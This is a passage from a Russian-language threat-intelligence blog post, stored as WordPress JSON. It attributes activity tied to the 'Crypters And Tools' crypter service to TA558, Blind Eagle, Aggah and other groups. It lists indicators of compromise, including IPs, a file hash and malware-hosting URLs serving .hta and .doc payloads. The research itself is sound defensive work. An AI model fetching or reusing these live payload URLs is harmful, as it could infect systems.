(servidorwindows.ddns.com.br)<\/p>\n<p align=\"left\">\u2022 \u041e\u0441\u043d\u043e\u0432\u043d\u0430\u044f \u0433\u0435\u043e\u0433\u0440\u0430\u0444\u0438\u044f \u0430\u0442\u0430\u043a \u2013 \u041b\u0430\u0442\u0438\u043d\u0441\u043a\u0430\u044f \u0410\u043c\u0435\u0440\u0438\u043a\u0430<\/p>\n<p align=\"left\">\u2022 \u0418\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u0435 \u0432 \u0444\u0438\u0448\u0438\u043d\u0433\u0435 \u0438\u0441\u043f\u0430\u043d\u0441\u043a\u043e\u0433\u043e \u044f\u0437\u044b\u043a\u0430<\/p>\n<p align=\"left\">\u2022 \u041f\u043e\u0445\u043e\u0436\u0438\u0439 \u0438\u043d\u0441\u0442\u0440\u0443\u043c\u0435\u043d\u0442\u0430\u0440\u0438\u0439 (Asyncrat, Remcos \u0438 \u0442.\u0434.)<\/p>\n<\/td>\n<\/tr>\n<tr>\n<td>\n<p align=\"left\"><strong>Aggah<\/strong><\/p>\n<\/td>\n<td>\n<p align=\"left\">N\/A<\/p>\n<\/td>\n<td>\n<p align=\"left\">\u00b7 \u0418\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u0435 \u043e\u0431\u0449\u0435\u0439 \u0438\u043d\u0444\u0440\u0430\u0441\u0442\u0440\u0443\u043a\u0442\u0443\u0440\u044b CryptersAndTools (149.56.200.165)<\/p>\n<p align=\"left\">\u00b7\u00a0<a href=\"https:\/\/ti.qianxin.com\/blog\/articles\/Subgroup-of-Blind-Eagle-Analysis-of-Recent-Attack-Activities-from-Hagga-Group-EN\/\">\u0418\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u0442\u0435\u043b\u0438, \u0443\u043f\u043e\u043c\u0438\u043d\u0430\u043b\u0438<\/a>, \u0432 \u0441\u0432\u043e\u0451\u043c \u0440\u0435\u043f\u043e\u0440\u0442\u0435, \u0447\u0442\u043e \u0432\u043e\u0437\u043c\u043e\u0436\u043d\u043e \u0433\u0440\u0443\u043f\u043f\u0430 Aggah \u2013 \u044d\u0442\u043e \u043f\u043e\u0434\u0433\u0440\u0443\u043f\u043f\u0430 Blind Eagle<\/p>\n<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<\/div>\n<\/div>\n<p>\u0422\u0430\u0431\u043b\u0438\u0446\u0430 3. \u041f\u0435\u0440\u0435\u0441\u0435\u0447\u0435\u043d\u0438\u0435 \u043c\u0435\u0436\u0434\u0443 \u0433\u0440\u0443\u043f\u043f\u0430\u043c\u0438<\/p>\n<p>\u0412\u0441\u0435 \u0442\u0440\u0438 \u0433\u0440\u0443\u043f\u043f\u044b \u0434\u043e \u0441\u0438\u0445 \u043f\u043e\u0440 \u0430\u043a\u0442\u0438\u0432\u043d\u044b \u0438 \u0441\u043e\u0432\u0435\u0440\u0448\u0430\u044e\u0442 \u043c\u043d\u043e\u0436\u0435\u0441\u0442\u0432\u043e \u0430\u0442\u0430\u043a. Aggah \u0432 \u0434\u0430\u043d\u043d\u044b\u0439 \u043c\u043e\u043c\u0435\u043d\u0442 \u043f\u0440\u0435\u043a\u0440\u0430\u0442\u0438\u043b\u0430 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u044c Crypters And Tools \u0438\u043b\u0438 \u0438\u043b\u0438 \u0438\u0445 \u0430\u0442\u0430\u043a\u0438 \u043d\u0430\u0445\u043e\u0434\u044f\u0442\u0441\u044f \u0432\u043d\u0435 \u0437\u043e\u043d\u044b \u043d\u0430\u0448\u0435\u0433\u043e \u043d\u0430\u0431\u043b\u044e\u0434\u0435\u043d\u0438\u044f. \u041f\u0440\u0438 \u044d\u0442\u043e\u043c \u0441\u0430\u043c\u0430 \u0433\u0440\u0443\u043f\u043f\u0430 \u0430\u043a\u0442\u0438\u0432\u043d\u0430, \u0438 \u043c\u044b \u0440\u0430\u0441\u0441\u043a\u0430\u0436\u0435\u043c \u043e\u0431 \u044d\u0442\u043e\u043c \u0432 \u0441\u043e\u043e\u0442\u0432\u0435\u0442\u0441\u0442\u0432\u0443\u044e\u0449\u0435\u043c \u0440\u0430\u0437\u0434\u0435\u043b\u0435.<\/p>\n<p>\u0412 \u044d\u0442\u043e \u0436\u0435 \u0432\u0440\u0435\u043c\u044f, \u0422\u0410558 \u0438 Blind Ealge \u0434\u043e \u0441\u0438\u0445 \u043f\u043e\u0440 \u0430\u043a\u0442\u0438\u0432\u043d\u043e \u043f\u043e\u043b\u044c\u0437\u0443\u044e\u0442\u0441\u044f \u043a\u0440\u0438\u043f\u0442\u043e\u0440\u043e\u043c.<\/p>\n<p>\u041d\u0430\u043f\u0440\u0438\u043c\u0435\u0440,<a href=\"https:\/\/research.checkpoint.com\/2025\/blind-eagle-and-justice-for-all\/\"> \u0432 \u043c\u0430\u0440\u0442\u043e\u0432\u0441\u043a\u043e\u0439 \u0441\u0442\u0430\u0442\u044c\u0435 Check Point Research<\/a> \u0440\u0430\u0441\u0441\u043a\u0430\u0437\u0430\u043b\u0438 \u043f\u0440\u043e \u0430\u0442\u0430\u043a\u0438 \u0433\u0440\u0443\u043f\u043f\u0438\u0440\u043e\u0432\u043a\u0438 Blind Eagle. \u041c\u044b \u043d\u0430\u0431\u043b\u044e\u0434\u0430\u043b\u0438 \u043e\u043f\u0438\u0441\u0430\u043d\u043d\u0443\u044e \u0430\u0442\u0430\u043a\u0443 \u0432 \u0444\u0435\u0432\u0440\u0430\u043b\u0435, \u0438 \u0442\u043e\u0433\u0434\u0430 \u043d\u0430\u0441 \u043f\u0440\u0438\u0432\u043b\u0435\u043a IP 62.60.226[.]64, \u043a\u043e\u0442\u043e\u0440\u044b\u0439 Check Point \u0442\u043e\u0436\u0435 \u0443\u043a\u0430\u0437\u0430\u043b\u0438 \u0432 \u043a\u0430\u0447\u0435\u0441\u0442\u0432\u0435 \u0438\u043d\u0434\u0438\u043a\u0430\u0442\u043e\u0440\u0430. \u041d\u0430 \u043d\u0451\u043c \u0440\u0430\u0441\u043f\u043e\u043b\u0430\u0433\u0430\u043b\u043e\u0441\u044c \u043c\u043d\u043e\u0436\u0435\u0441\u0442\u0432\u043e \u0444\u0430\u0439\u043b\u043e\u0432, \u0441\u0432\u044f\u0437\u0430\u043d\u043d\u044b\u0445 Crypters And Tools, \u0445\u043e\u0442\u044f \u0432 \u043a\u043e\u043d\u043a\u0440\u0435\u0442\u043d\u043e\u0439 \u0430\u0442\u0430\u043a\u0435 \u043a\u0440\u0438\u043f\u0442\u043e\u0440 \u043c\u043e\u0433 \u043d\u0435 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u044c\u0441\u044f.<\/p>\n<p>\u041f\u0440\u043e \u0430\u0442\u0430\u043a\u0438 Blind Eagle \u043c\u044b \u0442\u0430\u043a\u0436\u0435 \u0440\u0430\u0441\u0441\u043a\u0430\u0436\u0435\u043c \u043d\u0438\u0436\u0435 \u0432 \u0440\u0430\u0437\u0434\u0435\u043b\u0435 \u043f\u0440\u043e \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u0435\u0439 Crypters And Tools \u043f\u043e\u0434 \u043d\u0438\u043a\u0430\u043c\u0438 deadpoolstart2025 \u0438 ABBAS \u0438 \u0438\u0445 \u0441\u0432\u044f\u0437\u044c \u0441 \u0434\u0430\u043d\u043d\u043e\u0439 \u0433\u0440\u0443\u043f\u043f\u043e\u0439.<\/p>\n<p>\u0412 \u0441\u043b\u0443\u0447\u0430\u0435 \u0441 TA558 \u043f\u0440\u0438\u043c\u0435\u0440\u043e\u043c \u0430\u0442\u0430\u043a\u0438 \u0441 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u0435\u043c Crypters And Tools \u043c\u043e\u0436\u0435\u0442 \u043f\u043e\u0441\u043b\u0443\u0436\u0438\u0442\u044c \u0444\u0438\u0448\u0438\u043d\u0433\u043e\u0432\u0430\u044f \u0430\u0442\u0430\u043a\u0430 \u0432 \u043c\u0430\u0440\u0442\u0435, \u0433\u0434\u0435 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043b\u0441\u044f \u0441\u043b\u0435\u0434\u0443\u044e\u0449\u0438\u0439 \u0444\u0430\u0439\u043b:<\/p>\n<ul>\n<li>\n<p>Purchase Inquiry.xla (SHA-256: 55ea07bbd700488fd6330d289f210b2da119401a9e27009472d1afec2f6c6339)<\/p>\n<\/li>\n<\/ul>\n<p>\u0412 \u0430\u0442\u0430\u043a\u0435 \u0444\u0438\u0433\u0443\u0440\u0438\u0440\u043e\u0432\u0430\u043b\u0438 \u0442\u0438\u043f\u0438\u0447\u043d\u044b\u0435 \u0434\u043b\u044f TA558 URL:<\/p>\n<ul>\n<li>\n<p><a href=\"http:\/\/104.168.7.38\/xampp\/knct\/nicefeelingwithbestgoodthinksfor.txt\">http:\/\/104.168.7.38\/xampp\/knct\/nicefeelingwithbestgoodthinksfor.txt<\/a><\/p>\n<\/li>\n<li>\n<p>http:\/\/104.168.7.38\/xampp\/knct\/Lightgreatloversonhereforlovingpeoplesalot.hta<\/p>\n<\/li>\n<li>\n<p>http:\/\/104.168.7.38\/xampp\/knct\/Lightgreatloversonhereforlovingpeoplesalot.png<\/p>\n<\/li>\n<\/ul>\n<p>\u041f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u0438 Brainiac, syscore \u0438 negrocock, \u0441\u0432\u044f\u0437\u0430\u043d\u043d\u044b\u0435 \u0441 TA558, \u0442\u0430\u043a\u0436\u0435 \u0431\u0443\u0434\u0443\u0442 \u0443\u043f\u043e\u043c\u044f\u043d\u0443\u0442\u044b \u0432 \u0441\u043e\u043e\u0442\u0432\u0435\u0442\u0441\u0442\u0432\u0443\u044e\u0449\u0435\u043c \u0440\u0430\u0437\u0434\u0435\u043b\u0435.<\/p>\n<p>\u041e\u0442\u043c\u0435\u0442\u0438\u043c, \u0447\u0442\u043e TA558 \u0438 Blind Ealge \u043d\u0435 \u043e\u0433\u0440\u0430\u043d\u0438\u0447\u0438\u0432\u0430\u044e\u0442\u0441\u044f \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u0435\u043c \u0442\u043e\u043b\u044c\u043a\u043e Crypters And Tools \u0432 \u0441\u0432\u043e\u0438\u0445 \u0430\u0442\u0430\u043a\u0430\u0445. \u041d\u0430\u043f\u0440\u0438\u043c\u0435\u0440, \u0432 \u0430\u043f\u0440\u0435\u043b\u0435 2025 \u043c\u044b \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0438\u043b\u0438 \u0442\u0438\u043f\u0438\u0447\u043d\u043e\u0435 \u043f\u0438\u0441\u044c\u043c\u043e TA558:<\/p>\n<figure class=\"full-width\">\n<div><figcaption>\u0420\u0438\u0441\u0443\u043d\u043e\u043a 1. \u041f\u0440\u0438\u043c\u0435\u0440 \u043f\u0438\u0441\u044c\u043c\u0430 TA558<\/figcaption><\/div>\n<\/figure>\n<p>\u041f\u0438\u0441\u044c\u043c\u043e \u0441\u043e\u0434\u0435\u0440\u0436\u0430\u043b\u043e \u0434\u0432\u0430 \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u044b\u0445 \u0434\u043e\u043a\u0443\u043c\u0435\u043d\u0442\u0430, \u043a\u043e\u0442\u043e\u0440\u044b\u0435 \u0441\u043a\u0430\u0447\u0438\u0432\u0430\u043b\u0438 \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u0443\u044e \u043d\u0430\u0433\u0440\u0443\u0437\u043a\u0443 \u0441 \u0441\u0435\u0440\u0432\u0435\u0440\u0430 \u0441 \u0443\u0437\u043d\u0430\u0432\u0430\u0435\u043c\u044b\u043c \u0434\u043b\u044f \u0422\u0410558 \u043f\u0430\u0442\u0442\u0435\u0440\u043d\u043e\u043c:<\/p>\n<p>http:\/\/216.9.224.185\/33\/eco\/goodthingsforbestfeaturesgivenmegoodthingsforbest_______________goodthingsforbestfeaturesgivenme_____________goodthingsforbestfeaturesgivenme.doc<\/p>\n<p>\u0414\u0430\u043b\u0435\u0435 \u0441\u043a\u0430\u0447\u0438\u0432\u0430\u043b\u0441\u044f \u0438 \u0432\u044b\u043f\u043e\u043b\u043d\u044f\u043b\u0441\u044f goodthingsforbestfeaturesgivenme.vbe, \u0447\u0442\u043e \u043f\u0440\u0438\u0432\u043e\u0434\u0438\u043b\u043e \u043a \u0437\u0430\u0440\u0430\u0436\u0435\u043d\u0438\u044e \u0436\u0435\u0440\u0442\u0432\u044b \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u044b\u043c \u041f\u041e Remcos. Crypters And Tools \u0432 \u0434\u0430\u043d\u043d\u043e\u0439 \u0430\u0442\u0430\u043a\u0435 \u043d\u0435 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043b\u0441\u044f.<\/p>\n<p><a class=\"anchor\" name=\"4\" id=\"4\"><\/a><\/p>\n<h2>4. PhaseShifters, UAC-0050 \u0438 PhantomControl<\/h2>\n<p><a href=\"https:\/\/habr.com\/ru\/companies\/pt\/articles\/892896\/\">\u0412 \u043f\u0435\u0440\u0432\u043e\u0439 \u0447\u0430\u0441\u0442\u0438 \u043c\u044b \u0443\u0436\u0435 \u0440\u0430\u0441\u0441\u043a\u0430\u0437\u044b\u0432\u0430\u043b\u0438<\/a>, \u0447\u0442\u043e \u0432\u044b\u0448\u043b\u0438 \u043d\u0430 \u0441\u0430\u043c Crypters And Tools, \u043a\u043e\u0433\u0434\u0430 \u0438\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u043b\u0438 \u0433\u0440\u0443\u043f\u043f\u0438\u0440\u043e\u0432\u043a\u0438 PhaseShifters \u0438 UAC-0050. \u041f\u0435\u0440\u0435\u0441\u0435\u0447\u0435\u043d\u0438\u044f \u043c\u0435\u0436\u0434\u0443 \u044d\u0442\u0438\u043c\u0438 \u0433\u0440\u0443\u043f\u043f\u0438\u0440\u043e\u0432\u043a\u0430\u043c\u0438 \u043e\u043f\u0438\u0441\u0430\u043d\u044b \u0432 \u043e\u0434\u043d\u043e\u0439 \u0438\u0437 \u043d\u0430\u0448\u0438\u0445<a href=\"https:\/\/www.ptsecurity.com\/ru-ru\/research\/pt-esc-threat-intelligence\/deti-ne-spisyvaem-novye-tehniki-gruppirovki-phase-shifters\/\"> \u0441\u0442\u0430\u0442\u0435\u0439<\/a>, \u043f\u043e\u044d\u0442\u043e\u043c\u0443 \u043c\u044b \u043d\u0435 \u0431\u0443\u0434\u0435\u043c \u043a\u043e\u043d\u0446\u0435\u043d\u0442\u0440\u0438\u0440\u043e\u0432\u0430\u0442\u044c\u0441\u044f \u043d\u0430 \u044d\u0442\u0438\u0445 \u0433\u0440\u0443\u043f\u043f\u0430\u0445, \u043d\u043e \u043e\u0442\u043c\u0435\u0442\u0438\u043c, \u0447\u0442\u043e \u043d\u0435 \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0438\u043b\u0438 \u0438\u0445 \u044f\u0432\u043d\u043e\u0439 \u0441\u0432\u044f\u0437\u0438 \u0441 \u0441\u043e\u0437\u0434\u0430\u0442\u0435\u043b\u044f\u043c\u0438 \u0441\u0430\u043c\u043e\u0433\u043e \u043a\u0440\u0438\u043f\u0442\u043e\u0440\u0430. \u041f\u0440\u0435\u0434\u043f\u043e\u043b\u043e\u0436\u0438\u0442\u0435\u043b\u044c\u043d\u043e, \u043e\u043d\u0438 \u043f\u0440\u0438\u043e\u0431\u0440\u0435\u043b\u0438 \u043f\u043e\u0434\u043f\u0438\u0441\u043a\u0443.<\/p>\n<p>\u041f\u0440\u043e \u0433\u0440\u0443\u043f\u043f\u0443 PhantomControl \u0435\u0441\u0442\u044c \u0442\u043e\u043b\u044c\u043a\u043e \u0434\u0432\u0430 \u043e\u0442\u0447\u0435\u0442\u0430 \u043e\u0442 \u043a\u043e\u043c\u043f\u0430\u043d\u0438\u0438 Esentire. \u0412 \u043f\u0435\u0440\u0432\u043e\u043c<a href=\"https:\/\/www.esentire.com\/blog\/operation-phantomcontrol\"> \u043e\u0442\u0447\u0435\u0442\u0435<\/a> Crypters And Tools \u043d\u0435 \u0444\u0438\u0433\u0443\u0440\u0438\u0440\u043e\u0432\u0430\u043b, \u043d\u043e \u0432\u043e<a href=\"https:\/\/www.esentire.com\/blog\/phantomcontrol-returns-with-ande-loader-and-swaetrat\"> \u0432\u0442\u043e\u0440\u043e\u043c<\/a> \u0433\u0440\u0443\u043f\u043f\u0430 \u0441\u0442\u0430\u043b\u0430 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u044c Ande Loader. \u0412 \u043e\u0442\u0447\u0435\u0442\u0435 \u0434\u0430\u043d\u043d\u043e\u0435 \u0412\u041f\u041e \u0431\u044b\u043b\u043e \u0430\u0442\u0440\u0438\u0431\u0443\u0442\u0438\u0440\u043e\u0432\u0430\u043d\u043e \u043a \u0433\u0440\u0443\u043f\u043f\u0435 Blind Eagle, \u043d\u043e Ande Loader \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u0442\u0441\u044f \u0432 Crypters And Tools, \u043f\u043e\u044d\u0442\u043e\u043c\u0443 \u043f\u0440\u044f\u043c\u0430\u044f \u0430\u0442\u0440\u0438\u0431\u0443\u0446\u0438\u044f \u043d\u0435\u043a\u043e\u0440\u0440\u0435\u043a\u0442\u043d\u0430. \u0422\u0430\u043a, \u043d\u0430\u043f\u0440\u0438\u043c\u0435\u0440, \u0441\u0441\u044b\u043b\u043a\u0438 \u043d\u0430 paste.ee \u0438 \u043a\u0430\u0440\u0442\u0438\u043d\u043a\u0438, \u0443\u043a\u0430\u0437\u0430\u043d\u043d\u044b\u0435 \u0432 \u0441\u0442\u0430\u0442\u044c\u0435, \u043f\u0440\u0438\u043d\u0430\u0434\u043b\u0435\u0436\u0430\u0442 \u043a\u0440\u0438\u043f\u0442\u043e\u0440\u0443. \u041f\u043e\u044d\u0442\u043e\u043c\u0443 \u043c\u043e\u0436\u043d\u043e \u0442\u043e\u0447\u043d\u043e \u0441\u043a\u0430\u0437\u0430\u0442\u044c, \u0447\u0442\u043e \u0433\u0440\u0443\u043f\u043f\u0430 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043b\u0430 Crypters And Tools \u0432 \u0441\u0432\u043e\u0438\u0445 \u0430\u0442\u0430\u043a\u0430\u0445, \u043d\u043e \u0434\u043e\u043f\u043e\u043b\u043d\u0438\u0442\u0435\u043b\u044c\u043d\u043e\u0439 \u0438\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u0435\u0439 \u043e PhantomControl \u043c\u044b \u043d\u0435 \u0440\u0430\u0441\u043f\u043e\u043b\u0430\u0433\u0430\u0435\u043c.<\/p>\n<p><a class=\"anchor\" name=\"5\" id=\"5\"><\/a><\/p>\n<h2>5. \u041e\u0441\u043e\u0431\u0435\u043d\u043d\u043e\u0441\u0442\u0438 \u0433\u0440\u0443\u043f\u043f\u044b TA558 \u0438 \u0435\u0435 \u043e\u0442\u043b\u0438\u0447\u0438\u044f \u043e\u0442 \u0438\u043d\u0444\u0440\u0430\u0441\u0442\u0440\u0443\u043a\u0442\u0443\u0440\u044b Blind Eagle<\/h2>\n<p>\u0412 \u0441\u0442\u0430\u0442\u044c\u044f\u0445, \u0433\u0434\u0435 \u0438\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u0442\u0435\u043b\u0438 \u0441\u0442\u0430\u043b\u043a\u0438\u0432\u0430\u043b\u0438\u0441\u044c \u0441 Crypters And Tools \u0447\u0430\u0441\u0442\u043e \u0432\u043e\u0437\u043d\u0438\u043a\u0430\u043b\u0438 \u043b\u043e\u0436\u043d\u044b\u0435 \u0441\u0432\u044f\u0437\u0438 \u043c\u0435\u0436\u0434\u0443 \u0433\u0440\u0443\u043f\u043f\u0438\u0440\u043e\u0432\u043a\u0430\u043c\u0438 \u0438\u0437-\u0437\u0430 \u043e\u0442\u0441\u0443\u0442\u0441\u0442\u0432\u0438\u044f \u0440\u0430\u043d\u0435\u0435 \u0438\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u0438 \u043e \u0442\u043e\u043c, \u0447\u0442\u043e \u0434\u0430\u043d\u043d\u044b\u0439 \u043a\u0440\u0438\u043f\u0442\u043e\u0440 \u2013 \u044d\u0442\u043e \u043e\u0442\u0434\u0435\u043b\u044c\u043d\u0430\u044f \u0441\u0443\u0449\u043d\u043e\u0441\u0442\u044c, \u0430 \u043d\u0435 \u0443\u043d\u0438\u043a\u0430\u043b\u044c\u043d\u044b\u0439 \u0438\u043d\u0441\u0442\u0440\u0443\u043c\u0435\u043d\u0442 \u043a\u0430\u043a\u043e\u0439-\u0442\u043e \u0433\u0440\u0443\u043f\u043f\u0438\u0440\u043e\u0432\u043a\u0438. \u041f\u0440\u0438\u043c\u0435\u0440\u043e\u043c \u043c\u043e\u0436\u0435\u0442 \u0441\u043b\u0443\u0436\u0438\u0442\u044c<a href=\"https:\/\/ti.qianxin.com\/blog\/articles\/Subgroup-of-Blind-Eagle-Analysis-of-Recent-Attack-Activities-from-Hagga-Group-EN\/\"> \u043e\u0442\u0447\u0435\u0442<\/a> \u0438\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u0442\u0435\u043b\u0435\u0439 \u0438\u0437 Qi An Xin 2023 \u0433\u043e\u0434\u0430, \u0433\u0434\u0435 \u043e\u043d\u0438 \u043f\u0440\u0435\u0434\u043f\u043e\u043b\u0430\u0433\u0430\u044e\u0442, \u0447\u0442\u043e \u0433\u0440\u0443\u043f\u043f\u0430 Aggah \u043c\u043e\u0436\u0435\u0442 \u0431\u044b\u0442\u044c \u043f\u043e\u0434\u0433\u0440\u0443\u043f\u043f\u043e\u0439 Blind Eagle, \u043e\u0441\u043d\u043e\u0432\u044b\u0432\u0430\u044f\u0441\u044c \u043d\u0430 \u0437\u043d\u0430\u0447\u0438\u0442\u0435\u043b\u044c\u043d\u043e\u043c \u0441\u0445\u043e\u0434\u0441\u0442\u0432\u0435 TTP, \u0447\u0430\u0441\u0442\u0438\u0447\u043d\u043e\u043c \u043f\u0435\u0440\u0435\u0441\u0435\u0447\u0435\u043d\u0438\u0438 \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u043e\u0433\u043e \u041f\u041e, \u0433\u0435\u043e\u0433\u0440\u0430\u0444\u0438\u0447\u0435\u0441\u043a\u0438 \u0431\u043b\u0438\u0437\u043a\u0438\u043c \u0446\u0435\u043b\u044f\u043c \u0438 \u0442.\u0434. \u041c\u044b \u043d\u0435 \u0438\u0441\u043a\u043b\u044e\u0447\u0430\u0435\u043c \u044d\u0442\u0443 \u0432\u043e\u0437\u043c\u043e\u0436\u043d\u043e\u0441\u0442\u044c, \u043d\u043e \u0432 \u043f\u0440\u0435\u0434\u044b\u0434\u0443\u0449\u0435\u043c \u0438\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u043d\u0438\u0438 \u043c\u044b \u043e\u0431\u044a\u044f\u0441\u043d\u0438\u043b\u0438 \u0443\u043f\u043e\u043c\u044f\u043d\u0443\u0442\u044b\u0435 \u0432 \u0441\u0442\u0430\u0442\u044c\u0435 \u043f\u0435\u0440\u0435\u0441\u0435\u0447\u0435\u043d\u0438\u044f \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u0435\u043c Crypters And Tools. \u0422\u0435\u043c \u043d\u0435 \u043c\u0435\u043d\u0435\u0435, \u043f\u0440\u0438 \u0434\u0435\u0442\u0430\u043b\u044c\u043d\u043e\u043c \u0430\u043d\u0430\u043b\u0438\u0437\u0435 \u043f\u043e\u0437\u0434\u043d\u0438\u0445 \u0441\u0442\u0430\u0434\u0438\u0439 \u0430\u0442\u0430\u043a \u043e\u0442\u043b\u0438\u0447\u0438\u044f TA558 \u0438 Blind Eagle \u043d\u0430\u0447\u0438\u043d\u0430\u044e\u0442 \u043f\u0440\u043e\u044f\u0432\u043b\u044f\u0442\u044c\u0441\u044f.<\/p>\n<p>\u0412 \u0434\u0430\u043d\u043d\u043e\u043c<\/p>\n<\/div>\n<\/div>\n<\/div>\n<\/div>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[],"tags":[],"class_list":["post-458064","post","type-post","status-publish","format-standard","hentry"],"_links":{"self":[{"href":"https:\/\/savepearlharbor.com\/index.php?rest_route=\/wp\/v2\/posts\/458064","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/savepearlharbor.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/savepearlharbor.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/savepearlharbor.com\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/savepearlharbor.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=458064"}],"version-history":[{"count":0,"href":"https:\/\/savepearlharbor.com\/index.php?rest_route=\/wp\/v2\/posts\/458064\/revisions"}],"wp:attachment":[{"href":"https:\/\/savepearlharbor.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=458064"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/savepearlharbor.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=458064"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/savepearlharbor.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=458064"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}